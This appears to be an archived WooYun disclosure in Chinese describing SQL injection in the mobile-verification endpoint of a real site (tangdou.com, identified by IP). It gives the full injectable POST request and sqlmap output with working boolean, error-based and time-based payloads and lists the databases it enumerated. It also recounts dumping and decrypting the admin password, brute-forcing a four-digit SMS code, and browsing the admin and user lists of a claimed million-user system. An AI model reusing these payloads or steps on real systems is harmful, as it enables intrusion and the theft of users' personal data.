乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-22: 厂商已经主动忽略漏洞,细节向公众公开
如果百万用户还不能走首页 那么对乌云就真失望了
http://123.59.58.72/ 也就是等于 http://txd.tangdou.com
点击获取验证码处可注入
POST数据包:
POST /?action=chk_mobile HTTP/1.1Host: 123.59.58.72Content-Length: 17Accept: application/json, text/javascript, */*; q=0.01Origin: http://123.59.58.72X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 UBrowser/5.6.11466.201 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://123.59.58.72/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=eaecm668tnrd64ai5ibl5fk2o0Connection: closephone=13800138000*
你以为就这么就完了?NO看到admin 表就跑了下
解密了 admin 的密码后 登录后台(后台有手机短信验证码 猜测可能是4位数的 于是跑了下验证码 没想到真是4位数的 )登录后台后 这是管理员列表
这是用户列表 证明的确是百万用户 而不是虚构的
福利
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 397 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) Payload: phone=13800138000 OR NOT 3632=3632# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: phone=13800138000 AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x7171707a71,(SELECT (ELT(5987=5987,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: phone=13800138000 AND (SELECT * FROM (SELECT(SLEEP(5)))wJyo)---[12:46:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.4.41back-end DBMS: MySQL 5.0[12:46:33] [INFO] fetching database names[12:46:34] [INFO] the SQL query used returns 5 entries[12:46:34] [INFO] starting 5 threads[12:46:34] [INFO] retrieved: performance_schema[12:46:34] [INFO] retrieved: information_schema[12:46:34] [INFO] retrieved: mysql[12:46:34] [INFO] retrieved: tangdouapp[12:46:34] [INFO] retrieved: testavailable databases [5]:[*] information_schema[*] mysql[*] performance_schema[*] tangdouapp[*] test[12:46:34] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\123.59.58.72'
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)